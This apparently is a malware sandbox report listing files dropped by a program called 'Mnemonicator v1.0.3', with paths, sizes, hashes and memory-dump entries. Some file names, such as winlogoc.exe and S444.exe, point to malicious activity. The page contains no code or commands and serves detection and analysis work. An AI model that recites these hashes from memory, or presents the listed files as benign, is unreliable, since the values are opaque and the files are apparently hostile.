C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d013b69d1a8bc44a599a20aa767332ed

SHA1
9949c222e8664c419294d6bd5ca13184b2b2e3c8

SHA256
9fcb62333faf9fae34f4e882c6af4065a233063fbdf9a550ac849d650573463c

SHA512
3554c4ea46dea441d9ea98e24c55f71e7d75490b38a5ab81a3d7d267e85ceaa6f6a38dc339f2eed6544c2bb744ae16b2de69f6a2c74e56782c8e6a1782d996d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77-41173432500f4ddb9e9bdfcf8e3776be-x64.dll

Filesize
147KB

MD5
1b8bd653321cf3cbc786e563555fbc75

SHA1
5638efe0476c8c1b74c6604db419be814d1d90a0

SHA256
919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7

SHA512
bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zE8D68FA87\Mnemonicator v1.0.3\lib\test\cjkencodings\shift_jis-utf8.txt

Filesize
1KB

MD5
cc34bcc252d8014250b2fbc0a7880ead

SHA1
89a79425e089c311137adcdcf0a11dfa9d8a4e58

SHA256
a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b

SHA512
c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BHS100000.exe

Filesize
133KB

MD5
e99c2baa9321204be61b90dce2e07baf

SHA1
ce85faec31876c917b16ee347bf8186dd66e1282

SHA256
a48fec99e9b4b88fd0ea5c98916a9a7f026d7e54264aa87a3bc4d1f453fda41e

SHA512
9e4577abebc722db7d72047ae4d95b7120dec0aaa1101e3d22cafa5d103414ffe99e65d6fae4eedf659aac515142938504ede5ae658d6f6a5a2f5e391869a4ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe

Filesize
142KB

MD5
950f02f87a33fce7f76de27098414b0c

SHA1
cb846cf6851471ca8bd0f4f44b4dc51392bc098d

SHA256
c55623fe25bb0a8abcffaa47ad229c658c5092cc47f1768c4ec7994c7fae70cc

SHA512
27742af6296acb185cbd6cb1da7058a8e7df334e6a70b977d69f844e521c4df267c918ce7de0c89bb09c8fac1d693d60c75a0a62912a058ce6d157caf2cb234f

Download Submit
C:\Users\Admin\AppData\Local\Temp\S444.exe

Filesize
33KB

MD5
17e158e0f91dcc8168f2e416035926ed

SHA1
aac8bf1174db86568aab282b8a8de953c372ef1e

SHA256
bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b

SHA512
383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\Crypto\Hash\_keccak.pyd

Filesize
15KB

MD5
1708c4d1b28c303da19480af3c6d04ff

SHA1
bac78207efaa6d838a8684117e76fb871bd423d5

SHA256
c90fb9f28ad4e7deed774597b12aa7785f01dc4458076be514930bf7ab0d15ec

SHA512
2a174c1cb712e8b394cbee20c33974aa277e09631701c80864b8935680f8a4570fd040ea6f59ad71631d421183b329b85c749f0977aeb9de339dfabe7c23762e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\VCRUNTIME140.dll

Filesize
93KB

MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_asyncio.pyd

Filesize
63KB

MD5
0400b1958d0f7aa0d2ad409ea12ffec7

SHA1
ce1a5c61192ffe489a53f029ac0a95d4abb3d2b9

SHA256
6e25aa5931f175b971dfd05aab7a24cef29edd8f4b524341c414d0577c07a200

SHA512
8790f3f9c69823d55350ea63a1b8ebb3dad64942b6e6752109d2932b3bb848a5101e2a9a4645e93a476a8c4e5c8b27e15eb39b33fcc772a876b0e8ab9fd5eefa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_bz2.pyd

Filesize
85KB

MD5
a49c5f406456b79254eb65d015b81088

SHA1
cfc2a2a89c63df52947af3610e4d9b8999399c91

SHA256
ce4ef8ed1e72c1d3a6082d500a17a009eb6e8ed15022bf3b68a22291858feced

SHA512
bbafeff8c101c7425dc9b8789117fe4c5e516d217181d3574d9d81b8fec4b0bd34f1e1fe6e406ae95584dc671f788cd7b05c8d700baf59fbf21de9c902edf7ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_cffi_backend.cp38-win_amd64.pyd

Filesize
177KB

MD5
77b5d28b725596b08d4393786d98bd27

SHA1
e3f00478de1d28bc7d2e9f0b552778be3e32d43b

SHA256
f7a00ba343d6f1ea8997d95b242fbbd70856ec2b98677d5f8b52921b8658369c

SHA512
d44415d425f7423c3d68df22b72687a2d0da52966952e20d215553aa83de1e7a5192ec918a3d570d6c2362eb5500b56b87e3ffbc0b768bfa064585aea2a30e9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_ctypes.pyd

Filesize
124KB

MD5
291a0a9b63bae00a4222a6df71a22023

SHA1
7a6a2aad634ec30e8edb2d2d8d0895c708d84551

SHA256
820e840759eed12e19f3c485fd819b065b49d9dc704ae3599a63077416d63324

SHA512
d43ef6fc2595936b17b0a689a00be04968f11d7c28945af4c3a74589bd05f415bf4cb3b4e22ac496490daff533755999a69d5962ccffd12e09c16130ed57fd09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_decimal.pyd

Filesize
262KB

MD5
a2b554d61e6cf63c6e5bbafb20ae3359

SHA1
26e043efdaaa52e9034602cebeb564d4f9714a7f

SHA256
30eea56a4d1dd78f9d65fcb6168ab189cfa8098c38aad47ee770756a056749ca

SHA512
5ea99fa23e7657e9f01dc155741d5f93945a2e6c90f1494873aa7c35a8da0001815b31b387b239ef7de1695b8f416028166dd94db259d246d8dc10a37e20da97

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_hashlib.pyd

Filesize
46KB

MD5
5e5af52f42eaf007e3ac73fd2211f048

SHA1
1a981e66ab5b03f4a74a6bac6227cd45df78010b

SHA256
a30cf1a40e0b09610e34be187f1396ac5a44dcfb27bc7ff9b450d1318b694c1b

SHA512
bc37625005c3dad1129b158a2f1e91628d5c973961e0efd61513bb6c7b97d77922809afca8039d08c11903734450bc098c6e7b63655ff1e9881323e5cfd739fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_lzma.pyd

Filesize
159KB

MD5
cf9fd17b1706f3044a8f74f6d398d5f1

SHA1
c5cd0debbde042445b9722a676ff36a0ac3959ad

SHA256
9209ccc60115727b192bf7771551040ca6fdd50f9bf8c3d2eacbfd424e8245e4

SHA512
5fe922c00c6f7fd3cd9bc56fc51de1f44adffbdb0afc0583f1bb08008be628b9ac16f8560b0c3ba16138e1cdcaf1c525ef24241bed804804cdeb5961aed6385a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_multiprocessing.pyd

Filesize
29KB

MD5
5cadb7186df07ca4ca5a8654cb00c9f1

SHA1
513b9160a849a3d7d510f59ffa5e201809d0161b

SHA256
54c28dcf2f2a72fc854f49c76fb021bbf2b53675fe5b5ed021c61efe9467197b

SHA512
f853c618ca243b5da04e53079d3e6a0c6a9e4e358bb5020196b49638f28bf4171a487db7ce0e5e2c46df6a643c04434f967f1c614086121d1edddcf891f5a409

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_overlapped.pyd

Filesize
45KB

MD5
7d5bb2a3e4fbceaddfeef929a21e610c

SHA1
942b69e716ee522ef01bde792434c638e3d5497a

SHA256
5f92c163b9fe6abb0f8b106a972f6a86f84271b2e32c67f95737387c85719837

SHA512
8c44f1683fdea0d8121ff2fe36f2582313980ef20ee1985af7ff36acb022acbb7617e85d2dd3b8e75715444dc0cfc4487c81b43d0222bd832aac867875afbe30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_queue.pyd

Filesize
28KB

MD5
dd146e2fa08302496b15118bf47703cf

SHA1
d06813e2fcb30cbb00bb3893f30c2661686cf4b7

SHA256
67e4e888559ea2c62ff267b58d7a7e95c2ec361703b5aa232aa8b2a1f96a2051

SHA512
5b93a782c9562370fc5b3f289ca422b4d1a1c532e81bd6c95a0063f2e3889ecf828003e42b674439fc7cd0fa72f64ad607bab6910abe9d959a4fb9fb08df263c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_socket.pyd

Filesize
78KB

MD5
4827652de133c83fa1cae839b361856c

SHA1
182f9a04bdc42766cfd5fb352f2cb22e5c26665e

SHA256
87832a3b89e2ada8f704a8f066013660d591d9ce01ce901cc57a3b973f0858ba

SHA512
8d66d68613fdba0820257550de3c39b308b1dce659dca953d10a95ff2cf89c31afe512d30ed44422b31117058dc9fa15279e5ac84694da89b47f99b0ad7e338a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\_ssl.pyd

Filesize
152KB

MD5
d4dfd8c2894670e9f8d6302c09997300

SHA1
c3a6cc8d8079a06a4cac8950e0baba2b43fb1f8e

SHA256
0a721fc230eca278a69a2006e13dfa00e698274281378d4df35227e1f68ea3e0

SHA512
1422bf45d233e2e3f77dce30ba0123625f2a511f73dfdf42ee093b1755963d9abc371935111c28f0d2c02308c5e82867de2546d871c35e657da32a7182026048

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\base_library.zip

Filesize
824KB

MD5
71f009bde4035ae76bc579ff05cc96ae

SHA1
901c8fa78f681096149f4240f71f86f11612f22d

SHA256
6eecb9ecbc244eca6bc33e6eb6969a3fafc23fcd4c7eca55ebce50c0a34a3c8e

SHA512
7c5b7325a8d8656e6ca9573f886bc2b0386db742d4230344b3d66b076e6aecd356ed757f8ee67761be6d3d994d8919bfa02c5600aebb25e2621a1c795325b710

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\libcrypto-1_1.dll

Filesize
3.2MB

MD5
89511df61678befa2f62f5025c8c8448

SHA1
df3961f833b4964f70fcf1c002d9fd7309f53ef8

SHA256
296426e7ce11bc3d1cfa9f2aeb42f60c974da4af3b3efbeb0ba40e92e5299fdf

SHA512
9af069ea13551a4672fdd4635d3242e017837b76ab2815788148dd4c44b4cf3a650d43ac79cd2122e1e51e01fb5164e71ff81a829395bdb8e50bb50a33f0a668

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\libssl-1_1.dll

Filesize
674KB

MD5
50bcfb04328fec1a22c31c0e39286470

SHA1
3a1b78faf34125c7b8d684419fa715c367db3daa

SHA256
fddd0da02dcd41786e9aa04ba17ba391ce39dae6b1f54cfa1e2bb55bc753fce9

SHA512
370e6dfd318d905b79baf1808efbf6da58590f00006513bdaaed0c313f6fa6c36f634ea3b05f916cee59f4db25a23dd9e6f64caf3c04a200e78c193027f57685

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\pyexpat.pyd

Filesize
187KB

MD5
2ae23047648257afa90d0ca96811979f

SHA1
0833cf7ccae477faa4656c74d593d0f59844cadd

SHA256
5caf51f12406bdb980db1361fab79c51be8cac0a2a0071a083adf4d84f423e95

SHA512
13052eb183bb7eb8bb2740ff39f63805b69e920f2e21b482657a9995aa002579a88296b81ec415942511d2ed146689d1868b446f7e698e72da22f5c182706030

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\python38.dll

Filesize
4.0MB

MD5
26ba25d468a778d37f1a24f4514d9814

SHA1
b64fe169690557656ede3ae50d3c5a197fea6013

SHA256
2f3e368f5bcc1dda5e951682008a509751e6395f7328fd0f02c4e1a11f67c128

SHA512
80471bfeeab279ce4adfb9ee1962597fb8e1886b861e31bdff1e3aa0df06d93afeb3a3398e9519bab7152d4bd7d88fa9b328a2d7eb50a91eb60fead268912080

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\select.pyd

Filesize
27KB

MD5
e21cff76db11c1066fd96af86332b640

SHA1
e78ef7075c479b1d218132d89bf4bec13d54c06a

SHA256
fcc2e09a2355a5546922874fb4cac92ee00a33c0ed6adbc440d128d1e9f4ec28

SHA512
e86dba2326ca5ea3f5ef3af2abd3c23d5b29b6211acc865b6be5a51d5c8850b7cda8c069e6f631ac62f2047224c4b675bbe6ac97c7ba781de5b8016ebaffd46f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42522\unicodedata.pyd

Filesize
1.0MB

MD5
601aee84e12b87ca66826dfc7ca57231

SHA1
3a7812433ca7d443d4494446a9ced24b6774ceca

SHA256
d8091e62c74e1b2b648086f778c3c41ce01f09661a75ea207d3fea2cf26a8762

SHA512
7c2d64623c6cfd66d6729f59909c90aa944e810ff6514c58b2b3142ee90e8660b7ddf7fa187389dd333e47efe8b19e935dd4e9119c15375b69b4880d043877d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzjfslnk.a0y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe

Filesize
72KB

MD5
33fba80c2580eebf95e25dea03331f68

SHA1
d0ed67fbbff537eb393206fc41c18d59b9a4bb3c

SHA256
4cbe94aefe8a24ebac9fb5c11c1efc89c15b1a7b1a2bf3587baface318ee4b2b

SHA512
8213c45c68a38984a2ad11ab0651ae9933dc538ff260e31753f2f9c3aacff038048bcf2680bb7993b5f4005f48ae7e5c74e7325bdf6ef20df1ae7aa58f7ae4bc

Download Submit
C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe

Filesize
8.8MB

MD5
22c0a28db2d726b4741c0b9d7f782d5d

SHA1
de0ade2d7a1289690c2f7833d035dd331c3cd111

SHA256
0d5749448e941719982cb8f2c465232bdb7242bc201908506fd875526b51997d

SHA512
cf43ae4631cd663d96eb3ae8f26392fb16d33055304867018724fe783eeef49668067880c7e63afda163b7005a45afd41cb513fb32d8030f038676bb73a5b993

Download Submit
C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe

Filesize
327KB

MD5
5f6849b9359e0cb392bb400ff6f940d4

SHA1
9b68e05618b0ede2c17fa309a6428fbea7f820ef

SHA256
c8ba699afc695bd07bd872d54bba369c3ce3ff1ab78b9dbb75b8126731637ebf

SHA512
ae0b6c43f4f64953899423186ed1382f48c8739e5faa68065ba5d1ad3fb2914cbeaf068abbe0a8ad135352007a4323894b52df79005cf5841d4513dbd4cbd9f3

Download Submit
C:\Users\Admin\Desktop\Mnemonicator v1.0.3\python3.dll

Filesize
58KB

MD5
c9f0b55fce50c904dff9276014cef6d8

SHA1
9f9ae27df619b695827a5af29414b592fc584e43

SHA256
074b06ae1d0a0b5c26f0ce097c91e2f24a5d38b279849115495fc40c6c10117e

SHA512
8dd188003d8419a25de7fbb37b29a4bc57a6fd93f2d79b5327ad2897d4ae626d7427f4e6ac84463c158bcb18b6c1e02e83ed49f347389252477bbeeb864ac799

Download Submit
memory/1080-2787-0x0000000006440000-0x00000000064D2000-memory.dmp

Filesize
584KB

Download
memory/1080-2788-0x00000000063F0000-0x00000000063FA000-memory.dmp

Filesize
40KB

Download
memory/1368-2337-0x000001E137110000-0x000001E137132000-memory.dmp

Filesize
136KB

Download
memory/1472-2330-0x0000000000F40000-0x0000000000F66000-memory.dmp

Filesize
152KB

Download
memory/1700-2331-0x0000000000870000-0x0000000000888000-memory.dmp

Filesize
96KB

Download
memory/1740-2335-0x0000000005010000-0x0000000005076000-memory.dmp

Filesize
408KB

Download
memory/1740-2332-0x0000000000580000-0x000000000058E000-memory.dmp

Filesize
56KB

Download
memory/1740-2333-0x0000000005440000-0x00000000059E4000-memory.dmp

Filesize
5.6MB

Download
memory/1740-2334-0x0000000004F70000-0x000000000500C000-memory.dmp

Filesize
624KB

Download
memory/2936-2607-0x00000000024B0000-0x00000000024E6000-memory.dmp

Filesize
216KB

Download
memory/2936-2608-0x0000000005100000-0x0000000005728000-memory.dmp

Filesize
6.2MB

Download
memory/2936-2609-0x0000000004F10000-0x0000000004F32000-memory.dmp

Filesize
136KB

Download
memory/2936-2610-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/2936-2622-0x0000000005910000-0x0000000005C64000-memory.dmp

Filesize
3.3MB

Download
memory/2936-2623-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

Filesize
120KB

Download
memory/2936-2624-0x0000000005E10000-0x0000000005E5C000-memory.dmp

Filesize
304KB

Download
memory/2936-2625-0x0000000007630000-0x0000000007CAA000-memory.dmp

Filesize
6.5MB

Download
memory/2936-2626-0x00000000062D0000-0x00000000062EA000-memory.dmp

Filesize
104KB

Download